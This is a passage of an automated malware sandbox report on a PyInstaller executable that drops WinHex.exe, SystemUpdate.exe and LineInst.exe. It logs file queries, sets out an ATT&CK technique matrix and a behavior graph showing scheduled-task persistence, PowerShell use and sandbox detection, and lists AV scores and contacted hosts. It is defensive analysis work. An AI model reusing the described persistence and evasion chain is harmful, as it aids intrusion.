Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\WinHex.exe VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_MD5.pyd VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_MD5.pyd VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_Salsa20.pyd VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_Salsa20.pyd VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Protocol\_scrypt.pyd VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Protocol\_scrypt.pyd VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\WinHex.exe VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\WinHex.exe VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Util\_cpuid_c.pyd VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Util\_cpuid_c.pyd VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_ghash_portable.pyd VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_ghash_portable.pyd VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_ghash_clmul.pyd VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_ghash_clmul.pyd VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\WinHex.exe VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_ocb.pyd VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_ocb.pyd VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\WinHex.exe VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_aes.pyd VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_aes.pyd VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_aesni.pyd VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\SystemUpdate.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80722\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\SystemUpdate.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80722\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\SystemUpdate.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80722\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\SystemUpdate.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80722\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\SystemUpdate.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80722\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\SystemUpdate.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80722\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\SystemUpdate.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80722\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\SystemUpdate.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80722\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\SystemUpdate.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80722\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\SystemUpdate.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80722\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\SystemUpdate.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80722\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\SystemUpdate.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80722\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\SystemUpdate.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80722\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\SystemUpdate.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80722\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\SystemUpdate.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80722\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\SystemUpdate.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80722\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\SystemUpdate.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80722\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\SystemUpdate.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80722\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\SystemUpdate.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80722\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\SystemUpdate.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80722\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\SystemUpdate.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80722\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\SystemUpdate.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80722\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\SystemUpdate.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80722\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\SystemUpdate.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80722\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\SystemUpdate.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80722\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\SystemUpdate.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80722\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\SystemUpdate.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80722\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\SystemUpdate.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80722\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\SystemUpdate.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80722\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\SystemUpdate.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80722\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\SystemUpdate.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80722\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\SystemUpdate.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80722\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\SystemUpdate.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80722\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\SystemUpdate.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80722\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\SystemUpdate.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80722\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\SystemUpdate.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80722\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\SystemUpdate.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80722\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\SystemUpdate.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80722\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\SystemUpdate.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80722\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\SystemUpdate.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80722\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\SystemUpdate.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80722\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\SystemUpdate.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80722\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\SystemUpdate.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80722\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\SystemUpdate.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80722\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\SystemUpdate.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80722\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\SystemUpdate.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80722\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\SystemUpdate.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80722\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\SystemUpdate.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80722\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\SystemUpdate.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80722\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\SystemUpdate.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80722\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\SystemUpdate.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80722\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\SystemUpdate.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80722\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\SystemUpdate.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80722\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\SystemUpdate.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80722\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\SystemUpdate.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80722\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\SystemUpdate.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80722\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\SystemUpdate.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80722\base_library.zip VolumeInformation
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeCode function: 0_2_00007FF7A673B580 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF7A673B580
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeCode function: 0_2_00007FF7A6754E20 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,0_2_00007FF7A6754E20
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_0054D460 __EH_prolog3_GS,memset,RtlGetVersion,GetModuleHandleW,GetProcAddress,GetLastError,13_2_0054D460
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: SetupHost.exe, 0000000D.00000003.1796954749.0000000003380000.00000004.00000020.00020000.00000000.sdmp, SetupHost.exe, 0000000D.00000003.1796287324.0000000003380000.00000004.00000020.00020000.00000000.sdmp, SetupHost.exe, 0000000D.00000003.1797347208.000000000337B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\$Windows.~WS\Sources\SetupHost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire Infrastructure1
Drive-by Compromise		41
Windows Management Instrumentation		1
DLL Side-Loading		1
DLL Side-Loading		1
Deobfuscate/Decode Files or Information		1
Input Capture		2
System Time Discovery		Remote Services1
Archive Collected Data		1
Ingress Tool Transfer		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomains1
Replication Through Removable Media		2
Native API		2
Scheduled Task/Job		1
Access Token Manipulation		3
Obfuscated Files or Information		LSASS Memory11
Peripheral Device Discovery		Remote Desktop Protocol1
Input Capture		21
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts112
Command and Scripting Interpreter		Logon Script (Windows)11
Process Injection		1
Software Packing		Security Account Manager3
File and Directory Discovery		SMB/Windows Admin SharesData from Network Shared Drive1
Non-Standard Port		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal Accounts2
Scheduled Task/Job		Login Hook2
Scheduled Task/Job		1
Timestomp		NTDS68
System Information Discovery		Distributed Component Object ModelInput Capture2
Non-Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud Accounts1
PowerShell		Network Logon ScriptNetwork Logon Script1
DLL Side-Loading		LSA Secrets1
Query Registry		SSHKeylogging3
Application Layer Protocol		Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
Masquerading		Cached Domain Credentials271
Security Software Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Modify Registry		DCSync1
Process Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job151
Virtualization/Sandbox Evasion		Proc Filesystem151
Virtualization/Sandbox Evasion		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
Access Token Manipulation		/etc/passwd and /etc/shadow1
Application Window Discovery		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron11
Process Injection		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1581935 Sample: T1#U52a9#U624b1.0.1.exe Startdate: 29/12/2024 Architecture: WINDOWS Score: 48 127 sni1gl.wpc.alphacdn.net 2->127 129 shed.dual-low.s-part-0035.t-0009.t-msedge.net 2->129 131 5 other IPs or domains 2->131 147 Suricata IDS alerts for network traffic 2->147 149 Multi AV Scanner detection for submitted file 2->149 151 Sigma detected: Suspicious File Creation In Uncommon AppData Folder 2->151 153 AI detected suspicious sample 2->153 12 T1#U52a9#U624b1.0.1.exe 13 2->12         started        16 WinHex.exe 63 2->16         started        18 LineInst.exe 27 2->18         started        20 10 other processes 2->20 signatures3 process4 dnsIp5 101 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 12->101 dropped 103 C:\Users\user\AppData\Local\...\select.pyd, PE32+ 12->103 dropped 105 C:\Users\user\AppData\Local\...\python38.dll, PE32+ 12->105 dropped 113 8 other files (none is malicious) 12->113 dropped 167 Suspicious powershell command line found 12->167 169 Uses Register-ScheduledTask to add task schedules 12->169 171 Found pyInstaller with non standard icon 12->171 23 T1#U52a9#U624b1.0.1.exe 3 12->23         started        107 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 16->107 dropped 109 C:\Users\user\AppData\Local\...\select.pyd, PE32+ 16->109 dropped 111 C:\Users\user\AppData\Local\...\python38.dll, PE32+ 16->111 dropped 115 51 other files (none is malicious) 16->115 dropped 27 WinHex.exe 16->27         started        117 19 other files (none is malicious) 18->117 dropped 30 SetupHost.exe 18->30         started        133 192.168.2.4, 1122, 138, 443 unknown unknown 20->133 135 127.0.0.1 unknown unknown 20->135 137 239.255.255.250 unknown Reserved 20->137 32 chrome.exe 20->32         started        34 chrome.exe 20->34         started        36 chrome.exe 20->36         started        38 5 other processes 20->38 file6 signatures7 process8 dnsIp9 95 C:\Users\user\AppData\WinHex.exe, PE32+ 23->95 dropped 97 C:\Users\user\AppData\SystemUpdate.exe, PE32+ 23->97 dropped 99 C:\Users\user\AppData\LineInst.exe, PE32 23->99 dropped 155 Suspicious powershell command line found 23->155 40 cmd.exe 1 23->40         started        43 powershell.exe 37 23->43         started        45 powershell.exe 33 23->45         started        139 8.212.101.195, 1122, 49905, 49943 CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC Singapore 27->139 157 Tries to detect sandboxes / dynamic malware analysis system (QueryWinSAT) 27->157 47 cmd.exe 27->47         started        159 Query firmware table information (likely to detect VMs) 30->159 141 www.google.com 142.250.181.68, 443, 49780 GOOGLEUS United States 32->141 143 sni1gl.wpc.omegacdn.net 152.199.21.175, 443, 49813 EDGECASTUS United States 32->143 145 13 other IPs or domains 32->145 file10 signatures11 process12 signatures13 161 Uses cmd line tools excessively to alter registry or file data 40->161 163 Uses schtasks.exe or at.exe to add and modify task schedules 40->163 49 conhost.exe 40->49         started        51 attrib.exe 1 40->51         started        53 attrib.exe 1 40->53         started        55 attrib.exe 1 40->55         started        165 Loading BitLocker PowerShell Module 43->165 57 conhost.exe 43->57         started        59 conhost.exe 45->59         started        61 SystemUpdate.exe 47->61         started        65 conhost.exe 47->65         started        process14 file15 119 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 61->119 dropped 121 C:\Users\user\AppData\Local\...\select.pyd, PE32+ 61->121 dropped 123 C:\Users\user\AppData\Local\...\python38.dll, PE32+ 61->123 dropped 125 8 other files (none is malicious) 61->125 dropped 173 Found pyInstaller with non standard icon 61->173 67 SystemUpdate.exe 61->67         started        signatures16 process17 process18 69 cmd.exe 67->69         started        71 cmd.exe 67->71         started        73 cmd.exe 67->73         started        75 14 other processes 67->75 process19 77 conhost.exe 69->77         started        79 schtasks.exe 69->79         started        81 conhost.exe 71->81         started        83 schtasks.exe 71->83         started        85 conhost.exe 73->85         started        87 schtasks.exe 73->87         started        89 conhost.exe 75->89         started        91 schtasks.exe 75->91         started        93 26 other processes 75->93

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
T1#U52a9#U624b1.0.1.exe3%ReversingLabs
T1#U52a9#U624b1.0.1.exe14%VirustotalBrowse

Dropped Files

SourceDetectionScannerLabelLink
C:\$Windows.~WS\Sources\DU.dll0%ReversingLabs
C:\$Windows.~WS\Sources\DiagTrack.dll0%ReversingLabs
C:\$Windows.~WS\Sources\DiagTrackRunner.exe0%ReversingLabs
C:\$Windows.~WS\Sources\Diager.dll0%ReversingLabs
C:\$Windows.~WS\Sources\MediaSetupUIMgr.dll0%ReversingLabs
C:\$Windows.~WS\Sources\SetupCore.dll0%ReversingLabs
C:\$Windows.~WS\Sources\SetupHost.exe0%ReversingLabs
C:\$Windows.~WS\Sources\SetupMgr.dll0%ReversingLabs
C:\$Windows.~WS\Sources\WinDlp.dll0%ReversingLabs
C:\$Windows.~WS\Sources\pidgenx.dll0%ReversingLabs
C:\$Windows.~WS\Sources\setupplatform.dll0%ReversingLabs
C:\$Windows.~WS\Sources\unbcl.dll0%ReversingLabs
C:\$Windows.~WS\Sources\wdsclientapi.dll0%ReversingLabs
C:\$Windows.~WS\Sources\wdscore.dll0%ReversingLabs
C:\$Windows.~WS\Sources\wdscsl.dll0%ReversingLabs
C:\$Windows.~WS\Sources\wdsimage.dll0%ReversingLabs
C:\$Windows.~WS\Sources\wdstptc.dll0%ReversingLabs
C:\$Windows.~WS\Sources\wdsutil.dll0%ReversingLabs
C:\$Windows.~WS\Sources\wpx.dll0%ReversingLabs
C:\Users\user\AppData\LineInst.exe0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI73322\VCRUNTIME140.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI73322\_bz2.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI73322\_hashlib.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI73322\_lzma.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI73322\_socket.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI73322\_ssl.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI73322\libcrypto-1_1.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI73322\libssl-1_1.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI73322\python38.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI73322\select.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI73322\unicodedata.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_ARC4.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_Salsa20.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_chacha20.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_pkcs1_decode.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_aes.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_aesni.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_arc2.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_blowfish.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_cast.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_cbc.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_cfb.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_ctr.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_des.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_des3.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_ecb.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_eksblowfish.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_ocb.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_ofb.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_BLAKE2b.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_BLAKE2s.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_MD2.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_MD4.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_MD5.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_RIPEMD160.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_SHA1.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_SHA224.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_SHA256.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_SHA384.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_SHA512.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_ghash_clmul.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_ghash_portable.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_keccak.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_poly1305.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Math\_modexp.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Protocol\_scrypt.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\PublicKey\_ec_ws.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\PublicKey\_ed25519.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\PublicKey\_ed448.pyd0%ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://dl.delivery.mp.microsoft.0%Avira URL Cloudsafe
http://dl.delivery.mp.mi%0%Avira URL Cloudsafe
http://osoft.com/pki/ceooCerAut_2010-060%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
sni1gl.wpc.alphacdn.net
152.199.21.175
truefalse
    		high
    sni1gl.wpc.omegacdn.net
    		152.199.21.175
    		truefalse
      		high
      www.google.com
      		142.250.181.68
      		truefalse
        		high
        default.qdr.p1.ds-c7109-microsoft.global.dns.qwilted-cds.cqloud.com
        		217.20.58.101
        		truefalse
          		high
          api.company-target.com
          		108.139.79.18
          		truefalse
            		high
            s-part-0035.t-0009.t-msedge.net
            		13.107.246.63
            		truefalse
              		high
              js.monitor.azure.com
              		unknown
              		unknownfalse
                		high
                c.s-microsoft.com
                		unknown
                		unknownfalse
                  		high
                  assets.adobedtm.com
                  		unknown
                  		unknownfalse
                    		high
                    support.content.office.net
                    		unknown
                    		unknownfalse
                      		high
                      aadcdn.msftauth.net
                      		unknown
                      		unknownfalse
                        		high
                        login.microsoftonline.com
                        		unknown
                        		unknownfalse
                          		high
                          mem.gfx.ms
                          		unknown
                          		unknownfalse
                            		high

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1666700013.0000029E6BF00000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1667112966.0000029E6BF00000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1667988200.0000029E6BEDC000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000002.1717160899.0000029E6D860000.00000004.00001000.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1666300025.0000029E6BF00000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1713338433.0000029E6BF00000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1665944774.0000029E6BF00000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1666838129.0000029E6BF00000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1667199974.0000029E6BF00000.00000004.00000020.00020000.00000000.sdmp, 